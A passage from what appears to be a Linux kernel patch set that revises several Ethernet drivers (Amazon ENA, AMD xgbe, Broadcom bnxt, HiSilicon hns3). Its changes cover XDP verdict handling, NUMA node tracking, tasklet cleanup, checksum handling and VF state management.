+-		xdp_verdict = XDP_PASS;
++		xdp_verdict = ENA_XDP_PASS;
+ 		skb = NULL;
+ 		ena_rx_ctx.ena_bufs = rx_ring->ena_bufs;
+ 		ena_rx_ctx.max_bufs = rx_ring->sgl_size;
+@@ -1691,7 +1702,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp);
+ 
+ 		/* allocate skb and fill it */
+-		if (xdp_verdict == XDP_PASS)
++		if (xdp_verdict == ENA_XDP_PASS)
+ 			skb = ena_rx_skb(rx_ring,
+ 					 rx_ring->ena_bufs,
+ 					 ena_rx_ctx.descs,
+@@ -1709,14 +1720,15 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 				/* Packets was passed for transmission, unmap it
+ 				 * from RX side.
+ 				 */
+-				if (xdp_verdict == XDP_TX || xdp_verdict == XDP_REDIRECT) {
++				if (xdp_verdict & ENA_XDP_FORWARDED) {
+ 					ena_unmap_rx_buff(rx_ring,
+ 							  &rx_ring->rx_buffer_info[req_id]);
+ 					rx_ring->rx_buffer_info[req_id].page = NULL;
+ 				}
+ 			}
+-			if (xdp_verdict != XDP_PASS) {
++			if (xdp_verdict != ENA_XDP_PASS) {
+ 				xdp_flags |= xdp_verdict;
++				total_len += ena_rx_ctx.ena_bufs[0].len;
+ 				res_budget--;
+ 				continue;
+ 			}
+@@ -1760,7 +1772,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 		ena_refill_rx_bufs(rx_ring, refill_required);
+ 	}
+ 
+-	if (xdp_flags & XDP_REDIRECT)
++	if (xdp_flags & ENA_XDP_REDIRECT)
+ 		xdp_do_flush_map();
+ 
+ 	return work_done;
+@@ -1814,8 +1826,9 @@ static void ena_adjust_adaptive_rx_intr_moderation(struct ena_napi *ena_napi)
+ static void ena_unmask_interrupt(struct ena_ring *tx_ring,
+ 					struct ena_ring *rx_ring)
+ {
++	u32 rx_interval = tx_ring->smoothed_interval;
+ 	struct ena_eth_io_intr_reg intr_reg;
+-	u32 rx_interval = 0;
++
+ 	/* Rx ring can be NULL when for XDP tx queues which don't have an
+ 	 * accompanying rx_ring pair.
+ 	 */
+@@ -1853,20 +1866,27 @@ static void ena_update_ring_numa_node(struct ena_ring *tx_ring,
+ 	if (likely(tx_ring->cpu == cpu))
+ 		goto out;
+ 
++	tx_ring->cpu = cpu;
++	if (rx_ring)
++		rx_ring->cpu = cpu;
++
+ 	numa_node = cpu_to_node(cpu);
++
++	if (likely(tx_ring->numa_node == numa_node))
++		goto out;
++
+ 	put_cpu();
+ 
+ 	if (numa_node != NUMA_NO_NODE) {
+ 		ena_com_update_numa_node(tx_ring->ena_com_io_cq, numa_node);
+-		if (rx_ring)
++		tx_ring->numa_node = numa_node;
++		if (rx_ring) {
++			rx_ring->numa_node = numa_node;
+ 			ena_com_update_numa_node(rx_ring->ena_com_io_cq,
+ 						 numa_node);
++		}
+ 	}
+ 
+-	tx_ring->cpu = cpu;
+-	if (rx_ring)
+-		rx_ring->cpu = cpu;
+-
+ 	return;
+ out:
+ 	put_cpu();
+@@ -1987,11 +2007,10 @@ static int ena_io_poll(struct napi_struct *napi, int budget)
+ 			if (ena_com_get_adaptive_moderation_enabled(rx_ring->ena_dev))
+ 				ena_adjust_adaptive_rx_intr_moderation(ena_napi);
+ 
++			ena_update_ring_numa_node(tx_ring, rx_ring);
+ 			ena_unmask_interrupt(tx_ring, rx_ring);
+ 		}
+ 
+-		ena_update_ring_numa_node(tx_ring, rx_ring);
+-
+ 		ret = rx_work_done;
+ 	} else {
+ 		ret = budget;
+@@ -2376,7 +2395,7 @@ static int ena_create_io_tx_queue(struct ena_adapter *adapter, int qid)
+ 	ctx.mem_queue_type = ena_dev->tx_mem_queue_type;
+ 	ctx.msix_vector = msix_vector;
+ 	ctx.queue_size = tx_ring->ring_size;
+-	ctx.numa_node = cpu_to_node(tx_ring->cpu);
++	ctx.numa_node = tx_ring->numa_node;
+ 
+ 	rc = ena_com_create_io_queue(ena_dev, &ctx);
+ 	if (rc) {
+@@ -2444,7 +2463,7 @@ static int ena_create_io_rx_queue(struct ena_adapter *adapter, int qid)
+ 	ctx.mem_queue_type = ENA_ADMIN_PLACEMENT_POLICY_HOST;
+ 	ctx.msix_vector = msix_vector;
+ 	ctx.queue_size = rx_ring->ring_size;
+-	ctx.numa_node = cpu_to_node(rx_ring->cpu);
++	ctx.numa_node = rx_ring->numa_node;
+ 
+ 	rc = ena_com_create_io_queue(ena_dev, &ctx);
+ 	if (rc) {
+@@ -2805,6 +2824,24 @@ int ena_update_queue_sizes(struct ena_adapter *adapter,
+ 	return dev_was_up ? ena_up(adapter) : 0;
+ }
+ 
++int ena_set_rx_copybreak(struct ena_adapter *adapter, u32 rx_copybreak)
++{
++	struct ena_ring *rx_ring;
++	int i;
++
++	if (rx_copybreak > min_t(u16, adapter->netdev->mtu, ENA_PAGE_SIZE))
++		return -EINVAL;
++
++	adapter->rx_copybreak = rx_copybreak;
++
++	for (i = 0; i < adapter->num_io_queues; i++) {
++		rx_ring = &adapter->rx_ring[i];
++		rx_ring->rx_copybreak = rx_copybreak;
++	}
++
++	return 0;
++}
++
+ int ena_update_queue_count(struct ena_adapter *adapter, u32 new_channel_count)
+ {
+ 	struct ena_com_dev *ena_dev = adapter->ena_dev;
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.h b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+index 1bdce99bf6888..2cb141079474c 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.h
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+@@ -262,9 +262,11 @@ struct ena_ring {
+ 	bool disable_meta_caching;
+ 	u16 no_interrupt_event_cnt;
+ 
+-	/* cpu for TPH */
++	/* cpu and NUMA for TPH */
+ 	int cpu;
+-	 /* number of tx/rx_buffer_info's entries */
++	int numa_node;
++
++	/* number of tx/rx_buffer_info's entries */
+ 	int ring_size;
+ 
+ 	enum ena_admin_placement_policy_type tx_mem_queue_type;
+@@ -392,6 +394,8 @@ int ena_update_queue_sizes(struct ena_adapter *adapter,
+ 
+ int ena_update_queue_count(struct ena_adapter *adapter, u32 new_channel_count);
+ 
++int ena_set_rx_copybreak(struct ena_adapter *adapter, u32 rx_copybreak);
++
+ int ena_get_sset_count(struct net_device *netdev, int sset);
+ 
+ static inline void ena_reset_device(struct ena_adapter *adapter,
+@@ -409,6 +413,15 @@ enum ena_xdp_errors_t {
+ 	ENA_XDP_NO_ENOUGH_QUEUES,
+ };
+ 
++enum ENA_XDP_ACTIONS {
++	ENA_XDP_PASS		= 0,
++	ENA_XDP_TX		= BIT(0),
++	ENA_XDP_REDIRECT	= BIT(1),
++	ENA_XDP_DROP		= BIT(2)
++};
++
++#define ENA_XDP_FORWARDED (ENA_XDP_TX | ENA_XDP_REDIRECT)
++
+ static inline bool ena_xdp_present(struct ena_adapter *adapter)
+ {
+ 	return !!adapter->xdp_bpf_prog;
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+index 7b666106feee9..614c0278419bc 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+@@ -1064,6 +1064,9 @@ static void xgbe_free_irqs(struct xgbe_prv_data *pdata)
+ 
+ 	devm_free_irq(pdata->dev, pdata->dev_irq, pdata);
+ 
++	tasklet_kill(&pdata->tasklet_dev);
++	tasklet_kill(&pdata->tasklet_ecc);
++
+ 	if (pdata->vdata->ecc_support && (pdata->dev_irq != pdata->ecc_irq))
+ 		devm_free_irq(pdata->dev, pdata->ecc_irq, pdata);
+ 
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c b/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c
+index 22d4fc547a0a3..a9ccc4258ee50 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c
+@@ -447,8 +447,10 @@ static void xgbe_i2c_stop(struct xgbe_prv_data *pdata)
+ 	xgbe_i2c_disable(pdata);
+ 	xgbe_i2c_clear_all_interrupts(pdata);
+ 
+-	if (pdata->dev_irq != pdata->i2c_irq)
++	if (pdata->dev_irq != pdata->i2c_irq) {
+ 		devm_free_irq(pdata->dev, pdata->i2c_irq, pdata);
++		tasklet_kill(&pdata->tasklet_i2c);
++	}
+ }
+ 
+ static int xgbe_i2c_start(struct xgbe_prv_data *pdata)
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index 4e97b48695220..0c5c1b1556830 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -1390,8 +1390,10 @@ static void xgbe_phy_stop(struct xgbe_prv_data *pdata)
+ 	/* Disable auto-negotiation */
+ 	xgbe_an_disable_all(pdata);
+ 
+-	if (pdata->dev_irq != pdata->an_irq)
++	if (pdata->dev_irq != pdata->an_irq) {
+ 		devm_free_irq(pdata->dev, pdata->an_irq, pdata);
++		tasklet_kill(&pdata->tasklet_an);
++	}
+ 
+ 	pdata->phy_if.phy_impl.stop(pdata);
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 9f8a6ce4b356f..f5a8bae8d79a1 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -988,8 +988,7 @@ static struct sk_buff *bnxt_rx_multi_page_skb(struct bnxt *bp,
+ 	dma_addr -= bp->rx_dma_offset;
+ 	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, PAGE_SIZE, bp->rx_dir,
+ 			     DMA_ATTR_WEAK_ORDERING);
+-	skb = build_skb(page_address(page), BNXT_PAGE_MODE_BUF_SIZE +
+-					    bp->rx_dma_offset);
++	skb = build_skb(page_address(page), PAGE_SIZE);
+ 	if (!skb) {
+ 		__free_page(page);
+ 		return NULL;
+@@ -1922,7 +1921,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	dma_addr = rx_buf->mapping;
+ 
+ 	if (bnxt_xdp_attached(bp, rxr)) {
+-		bnxt_xdp_buff_init(bp, rxr, cons, &data_ptr, &len, &xdp);
++		bnxt_xdp_buff_init(bp, rxr, cons, data_ptr, len, &xdp);
+ 		if (agg_bufs) {
+ 			u32 frag_len = bnxt_rx_agg_pages_xdp(bp, cpr, &xdp,
+ 							     cp_cons, agg_bufs,
+@@ -1937,7 +1936,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	}
+ 
+ 	if (xdp_active) {
+-		if (bnxt_rx_xdp(bp, rxr, cons, xdp, data, &len, event)) {
++		if (bnxt_rx_xdp(bp, rxr, cons, xdp, data, &data_ptr, &len, event)) {
+ 			rc = 1;
+ 			goto next_rx;
+ 		}
+@@ -3966,8 +3965,10 @@ void bnxt_set_ring_params(struct bnxt *bp)
+ 		bp->rx_agg_ring_mask = (bp->rx_agg_nr_pages * RX_DESC_CNT) - 1;
+ 
+ 		if (BNXT_RX_PAGE_MODE(bp)) {
+-			rx_space = BNXT_PAGE_MODE_BUF_SIZE;
+-			rx_size = BNXT_MAX_PAGE_MODE_MTU;
++			rx_space = PAGE_SIZE;
++			rx_size = PAGE_SIZE -
++				  ALIGN(max(NET_SKB_PAD, XDP_PACKET_HEADROOM), 8) -
++				  SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 		} else {
+ 			rx_size = SKB_DATA_ALIGN(BNXT_RX_COPY_THRESH + NET_IP_ALIGN);
+ 			rx_space = rx_size + NET_SKB_PAD +
+@@ -5370,15 +5371,16 @@ static int bnxt_hwrm_vnic_set_hds(struct bnxt *bp, u16 vnic_id)
+ 	req->flags = cpu_to_le32(VNIC_PLCMODES_CFG_REQ_FLAGS_JUMBO_PLACEMENT);
+ 	req->enables = cpu_to_le32(VNIC_PLCMODES_CFG_REQ_ENABLES_JUMBO_THRESH_VALID);
+ 
+-	if (BNXT_RX_PAGE_MODE(bp) && !BNXT_RX_JUMBO_MODE(bp)) {
++	if (BNXT_RX_PAGE_MODE(bp)) {
++		req->jumbo_thresh = cpu_to_le16(bp->rx_buf_use_size);
++	} else {
+ 		req->flags |= cpu_to_le32(VNIC_PLCMODES_CFG_REQ_FLAGS_HDS_IPV4 |
+ 					  VNIC_PLCMODES_CFG_REQ_FLAGS_HDS_IPV6);
+ 		req->enables |=
+ 			cpu_to_le32(VNIC_PLCMODES_CFG_REQ_ENABLES_HDS_THRESHOLD_VALID);
++		req->jumbo_thresh = cpu_to_le16(bp->rx_copy_thresh);
++		req->hds_threshold = cpu_to_le16(bp->rx_copy_thresh);
+ 	}
+-	/* thresholds not implemented in firmware yet */
+-	req->jumbo_thresh = cpu_to_le16(bp->rx_copy_thresh);
+-	req->hds_threshold = cpu_to_le16(bp->rx_copy_thresh);
+ 	req->vnic_id = cpu_to_le32(vnic->fw_vnic_id);
+ 	return hwrm_req_send(bp, req);
+ }
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+index d5fa43cfe5248..02741d499bf4a 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h
+@@ -591,12 +591,20 @@ struct nqe_cn {
+ #define BNXT_RX_PAGE_SIZE (1 << BNXT_RX_PAGE_SHIFT)
+ 
+ #define BNXT_MAX_MTU		9500
+-#define BNXT_PAGE_MODE_BUF_SIZE \
++
++/* First RX buffer page in XDP multi-buf mode
++ *
++ * +-------------------------------------------------------------------------+
++ * | XDP_PACKET_HEADROOM | bp->rx_buf_use_size              | skb_shared_info|
++ * | (bp->rx_dma_offset) |                                  |                |
++ * +-------------------------------------------------------------------------+
++ */
++#define BNXT_MAX_PAGE_MODE_MTU_SBUF \
+ 	((unsigned int)PAGE_SIZE - VLAN_ETH_HLEN - NET_IP_ALIGN -	\
+ 	 XDP_PACKET_HEADROOM)
+ #define BNXT_MAX_PAGE_MODE_MTU	\
+-	BNXT_PAGE_MODE_BUF_SIZE - \
+-	SKB_DATA_ALIGN((unsigned int)sizeof(struct skb_shared_info))
++	(BNXT_MAX_PAGE_MODE_MTU_SBUF - \
++	 SKB_DATA_ALIGN((unsigned int)sizeof(struct skb_shared_info)))
+ 
+ #define BNXT_MIN_PKT_SIZE	52
+ 
+@@ -2131,7 +2139,6 @@ struct bnxt {
+ #define BNXT_DUMP_CRASH		1
+ 
+ 	struct bpf_prog		*xdp_prog;
+-	u8			xdp_has_frags;
+ 
+ 	struct bnxt_ptp_cfg	*ptp_cfg;
+ 	u8			ptp_all_rx_tstamp;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+index c3065ec0a4798..36d5202c0aeec 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+@@ -177,7 +177,7 @@ bool bnxt_xdp_attached(struct bnxt *bp, struct bnxt_rx_ring_info *rxr)
+ }
+ 
+ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+-			u16 cons, u8 **data_ptr, unsigned int *len,
++			u16 cons, u8 *data_ptr, unsigned int len,
+ 			struct xdp_buff *xdp)
+ {
+ 	struct bnxt_sw_rx_bd *rx_buf;
+@@ -191,13 +191,10 @@ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+ 	offset = bp->rx_offset;
+ 
+ 	mapping = rx_buf->mapping - bp->rx_dma_offset;
+-	dma_sync_single_for_cpu(&pdev->dev, mapping + offset, *len, bp->rx_dir);
+-
+-	if (bp->xdp_has_frags)
+-		buflen = BNXT_PAGE_MODE_BUF_SIZE + offset;
++	dma_sync_single_for_cpu(&pdev->dev, mapping + offset, len, bp->rx_dir);
+ 
+ 	xdp_init_buff(xdp, buflen, &rxr->xdp_rxq);
+-	xdp_prepare_buff(xdp, *data_ptr - offset, offset, *len, false);
++	xdp_prepare_buff(xdp, data_ptr - offset, offset, len, false);
+ }
+ 
+ void bnxt_xdp_buff_frags_free(struct bnxt_rx_ring_info *rxr,
+@@ -222,7 +219,8 @@ void bnxt_xdp_buff_frags_free(struct bnxt_rx_ring_info *rxr,
+  * false   - packet should be passed to the stack.
+  */
+ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+-		 struct xdp_buff xdp, struct page *page, unsigned int *len, u8 *event)
++		 struct xdp_buff xdp, struct page *page, u8 **data_ptr,
++		 unsigned int *len, u8 *event)
+ {
+ 	struct bpf_prog *xdp_prog = READ_ONCE(rxr->xdp_prog);
+ 	struct bnxt_tx_ring_info *txr;
+@@ -255,8 +253,10 @@ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+ 		*event &= ~BNXT_RX_EVENT;
+ 
+ 	*len = xdp.data_end - xdp.data;
+-	if (orig_data != xdp.data)
++	if (orig_data != xdp.data) {
+ 		offset = xdp.data - xdp.data_hard_start;
++		*data_ptr = xdp.data_hard_start + offset;
++	}
+ 
+ 	switch (act) {
+ 	case XDP_PASS:
+@@ -401,10 +401,8 @@ static int bnxt_xdp_set(struct bnxt *bp, struct bpf_prog *prog)
+ 		netdev_warn(dev, "ethtool rx/tx channels must be combined to support XDP.\n");
+ 		return -EOPNOTSUPP;
+ 	}
+-	if (prog) {
++	if (prog)
+ 		tx_xdp = bp->rx_nr_rings;
+-		bp->xdp_has_frags = prog->aux->xdp_has_frags;
+-	}
+ 
+ 	tc = netdev_get_num_tc(dev);
+ 	if (!tc)
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h
+index 505911ae095d3..ea430d6961df3 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.h
+@@ -18,8 +18,8 @@ struct bnxt_sw_tx_bd *bnxt_xmit_bd(struct bnxt *bp,
+ 				   struct xdp_buff *xdp);
+ void bnxt_tx_int_xdp(struct bnxt *bp, struct bnxt_napi *bnapi, int nr_pkts);
+ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+-		 struct xdp_buff xdp, struct page *page, unsigned int *len,
+-		 u8 *event);
++		 struct xdp_buff xdp, struct page *page, u8 **data_ptr,
++		 unsigned int *len, u8 *event);
+ int bnxt_xdp(struct net_device *dev, struct netdev_bpf *xdp);
+ int bnxt_xdp_xmit(struct net_device *dev, int num_frames,
+ 		  struct xdp_frame **frames, u32 flags);
+@@ -27,7 +27,7 @@ int bnxt_xdp_xmit(struct net_device *dev, int num_frames,
+ bool bnxt_xdp_attached(struct bnxt *bp, struct bnxt_rx_ring_info *rxr);
+ 
+ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+-			u16 cons, u8 **data_ptr, unsigned int *len,
++			u16 cons, u8 *data_ptr, unsigned int len,
+ 			struct xdp_buff *xdp);
+ void bnxt_xdp_buff_frags_free(struct bnxt_rx_ring_info *rxr,
+ 			      struct xdp_buff *xdp);
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+index 028577943ec57..248f15dac86ba 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_enet.c
+@@ -3855,18 +3855,16 @@ static int hns3_gro_complete(struct sk_buff *skb, u32 l234info)
+ 	return 0;
+ }
+ 
+-static bool hns3_checksum_complete(struct hns3_enet_ring *ring,
++static void hns3_checksum_complete(struct hns3_enet_ring *ring,
+ 				   struct sk_buff *skb, u32 ptype, u16 csum)
+ {
+ 	if (ptype == HNS3_INVALID_PTYPE ||
+ 	    hns3_rx_ptype_tbl[ptype].ip_summed != CHECKSUM_COMPLETE)
+-		return false;
++		return;
+ 
+ 	hns3_ring_stats_update(ring, csum_complete);
+ 	skb->ip_summed = CHECKSUM_COMPLETE;
+ 	skb->csum = csum_unfold((__force __sum16)csum);
+-
+-	return true;
+ }
+ 
+ static void hns3_rx_handle_csum(struct sk_buff *skb, u32 l234info,
+@@ -3926,8 +3924,7 @@ static void hns3_rx_checksum(struct hns3_enet_ring *ring, struct sk_buff *skb,
+ 		ptype = hnae3_get_field(ol_info, HNS3_RXD_PTYPE_M,
+ 					HNS3_RXD_PTYPE_S);
+ 
+-	if (hns3_checksum_complete(ring, skb, ptype, csum))
+-		return;
++	hns3_checksum_complete(ring, skb, ptype, csum);
+ 
+ 	/* check if hardware has done checksum */
+ 	if (!(bd_base_info & BIT(HNS3_RXD_L3L4P_B)))
+@@ -3936,6 +3933,7 @@ static void hns3_rx_checksum(struct hns3_enet_ring *ring, struct sk_buff *skb,
+ 	if (unlikely(l234info & (BIT(HNS3_RXD_L3E_B) | BIT(HNS3_RXD_L4E_B) |
+ 				 BIT(HNS3_RXD_OL3E_B) |
+ 				 BIT(HNS3_RXD_OL4E_B)))) {
++		skb->ip_summed = CHECKSUM_NONE;
+ 		hns3_ring_stats_update(ring, l3l4_csum_err);
+ 
+ 		return;
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+index 4e54f91f7a6c1..07ad5f35219e2 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3pf/hclge_main.c
+@@ -3910,9 +3910,17 @@ static int hclge_set_all_vf_rst(struct hclge_dev *hdev, bool reset)
+ 			return ret;
+ 		}
+ 
+-		if (!reset || !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
++		if (!reset ||
++		    !test_bit(HCLGE_VPORT_STATE_INITED, &vport->state))
+ 			continue;
+ 
++		if (!test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state) &&
++		    hdev->reset_type == HNAE3_FUNC_RESET) {
++			set_bit(HCLGE_VPORT_NEED_NOTIFY_RESET,
++				&vport->need_notify);
++			continue;
++		}
++
+ 		/* Inform VF to process the reset.
+ 		 * hclge_inform_reset_assert_to_vf may fail if VF
+ 		 * driver is not loaded.
+@@ -4609,18 +4617,25 @@ static void hclge_reset_service_task(struct hclge_dev *hdev)
+ 
+ static void hclge_update_vport_alive(struct hclge_dev *hdev)
+ {
++#define HCLGE_ALIVE_SECONDS_NORMAL		8
++
++	unsigned long alive_time = HCLGE_ALIVE_SECONDS_NORMAL * HZ;
+ 	int i;
+ 
+ 	/* start from vport 1 for PF is always alive */
+ 	for (i = 1; i < hdev->num_alloc_vport; i++) {
+ 		struct hclge_vport *vport = &hdev->vport[i];
+ 
+-		if (time_after(jiffies, vport->last_active_jiffies + 8 * HZ))
++		if (!test_bit(HCLGE_VPORT_STATE_INITED, &vport->state) ||
++		    !test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
++			continue;
++		if (time_after(jiffies, vport->last_active_jiffies +
++			       alive_time)) {
+ 			clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
+-
+-		/* If vf is not alive, set to default value */
+-		if (!test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
+-			vport->mps = HCLGE_MAC_DEFAULT_FRAME;
++			dev_warn(&hdev->pdev->dev,
++				 "VF %u heartbeat timeout\n",
++				 i - HCLGE_VF_VPORT_START_NUM);
++		}
+ 	}
+ }
+ 
+@@ -8064,9 +8079,11 @@ int hclge_vport_start(struct hclge_vport *vport)
+ {
+ 	struct hclge_dev *hdev = vport->back;
+ 
++	set_bit(HCLGE_VPORT_STATE_INITED, &vport->state);
+ 	set_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
+ 	set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state);
+ 	vport->last_active_jiffies = jiffies;
++	vport->need_notify = 0;
+ 
+ 	if (test_bit(vport->vport_id, hdev->vport_config_block)) {
+ 		if (vport->vport_id) {
+@@ -8084,7 +8101,9 @@ int hclge_vport_start(struct hclge_vport *vport)
+ 
+ void hclge_vport_stop(struct hclge_vport *vport)
+ {
++	clear_bit(HCLGE_VPORT_STATE_INITED, &vport->state);
+ 	clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
++	vport->need_notify = 0;
+ }
+ 
+ static int hclge_client_start(struct hnae3_handle *handle)
+@@ -9208,7 +9227,8 @@ static int hclge_set_vf_mac(struct hnae3_handle *handle, int vf,
+ 		return 0;
+ 	}
+ 
+-	dev_info(&hdev->pdev->dev, "MAC of VF %d has been set to %s\n",
++	dev_info(&hdev->pdev->dev,
++		 "MAC of VF %d has been set to %s, will be active after VF reset\n",
+ 		 vf, format_mac_addr);
+ 	return 0;
+ }
+@@ -10465,12 +10485,16 @@ static int hclge_set_vf_vlan_filter(struct hnae3_handle *handle, int vfid,
+ 	 * for DEVICE_VERSION_V3, vf doesn't need to know about the port based
+ 	 * VLAN state.
+ 	 */
+-	if (ae_dev->dev_version < HNAE3_DEVICE_VERSION_V3 &&
+-	    test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
+-		(void)hclge_push_vf_port_base_vlan_info(&hdev->vport[0],
+-							vport->vport_id,
+-							state, &vlan_info);
+-
++	if (ae_dev->dev_version < HNAE3_DEVICE_VERSION_V3) {
++		if (test_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state))
++			(void)hclge_push_vf_port_base_vlan_info(&hdev->vport[0],
++								vport->vport_id,
++								state,
++								&vlan_info);
++		else
++			set_bit(HCLGE_VPORT_NEED_NOTIFY_VF_VLAN,
++				&vport->need_notify);
++	}
+ 	return 0;
+ }
+ 
+@@ -11941,7 +11965,7 @@ static void hclge_reset_vport_state(struct hclge_dev *hdev)
+ 	int i;
+ 
+ 	for (i = 0; i < hdev->num_alloc_vport; i++) {
+-		hclge_vport_stop(vport);
++		clear_bit(HCLGE_VPORT_STATE_ALIVE, &vport->state);
+ 		vport++;
+ 	}
+ }
+@@ -12754,60 +12778,71 @@ static int hclge_gro_en(struct hnae3_handle *handle, bool enable)
+ 	return ret;
+ }
+ 
+-static void hclge_sync_promisc_mode(struct hclge_dev *hdev)
++static int hclge_sync_vport_promisc_mode(struct hclge_vport *vport)
+ {
+-	struct hclge_vport *vport = &hdev->vport[0];
+ 	struct hnae3_handle *handle = &vport->nic;
++	struct hclge_dev *hdev = vport->back;
++	bool uc_en = false;
++	bool mc_en = false;
+ 	u8 tmp_flags;
++	bool bc_en;
+ 	int ret;
+-	u16 i;
+ 
+ 	if (vport->last_promisc_flags != vport->overflow_promisc_flags) {
+ 		set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state);
+ 		vport->last_promisc_flags = vport->overflow_promisc_flags;
+ 	}
+ 
+-	if (test_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state)) {
++	if (!test_and_clear_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
++				&vport->state))
++		return 0;
++
++	/* for PF */
++	if (!vport->vport_id) {
+ 		tmp_flags = handle->netdev_flags | vport->last_promisc_flags;
+ 		ret = hclge_set_promisc_mode(handle, tmp_flags & HNAE3_UPE,
+ 					     tmp_flags & HNAE3_MPE);
+-		if (!ret) {
+-			clear_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
+-				  &vport->state);
++		if (!ret)
+ 			set_bit(HCLGE_VPORT_STATE_VLAN_FLTR_CHANGE,
+ 				&vport->state);
+-		}
++		else
++			set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
++				&vport->state);
++		return ret;
+ 	}
+ 
+-	for (i = 1; i < hdev->num_alloc_vport; i++) {
+-		bool uc_en = false;
+-		bool mc_en = false;
+-		bool bc_en;
++	/* for VF */
++	if (vport->vf_info.trusted) {
++		uc_en = vport->vf_info.request_uc_en > 0 ||
++			vport->overflow_promisc_flags & HNAE3_OVERFLOW_UPE;
++		mc_en = vport->vf_info.request_mc_en > 0 ||
++			vport->overflow_promisc_flags & HNAE3_OVERFLOW_MPE;
++	}
++	bc_en = vport->vf_info.request_bc_en > 0;
+ 
+-		vport = &hdev->vport[i];
++	ret = hclge_cmd_set_promisc_mode(hdev, vport->vport_id, uc_en,
++					 mc_en, bc_en);
++	if (ret) {
++		set_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE, &vport->state);
++		return ret;
++	}
++	hclge_set_vport_vlan_fltr_change(vport);
+ 
+-		if (!test_and_clear_bit(HCLGE_VPORT_STATE_PROMISC_CHANGE,
+-					&vport->state))
+-			continue;
++	return 0;
++}
+ 
+-		if (vport->vf_info.trusted) {
+-			uc_en = vport->vf_info.request_uc_en > 0 ||
+-				vport->overflow_promisc_flags &
+-				HNAE3_OVERFLOW_UPE;
+-			mc_en = vport->vf_info.request_mc_en > 0 ||
+-				vport->overflow_promisc_flags &
+-				HNAE3_OVERFLOW_MPE;
+-		}
+-		bc_en = vport->vf_info.request_bc_en > 0;
